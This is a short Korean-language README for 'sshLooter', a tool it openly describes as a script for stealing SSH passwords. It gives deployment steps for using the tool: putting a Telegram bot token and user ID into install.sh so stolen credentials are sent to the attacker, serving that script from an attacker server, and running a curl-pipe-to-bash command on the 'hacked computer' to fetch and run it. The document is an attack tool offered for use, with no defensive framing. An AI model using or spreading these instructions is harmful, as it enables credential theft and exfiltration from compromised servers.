
ssh에서 비밀번호를 탈취하는 스크립트.
훨씬 더 나은 C 버전이 있습니다: sshLooterC
SSH 비밀번호를 훔치는 스크립트입니다.
git clone https://github.com/mthbernardes/sshLooter.git cd sshLooter
install.sh 스크립트를 편집하고 텔레그램 봇 API와 사용자 ID를 추가하세요. 텔레그램에서 @botfather를 호출하여 봇을 만들고, @userinfobot을 호출하여 사용자 ID를 얻으세요.
서버에서 다음을 실행하세요. python -m SimpleHTTPServer 해킹된 컴퓨터에서 다음을 실행하세요. curl http://yourserverip:8000/install.sh | bash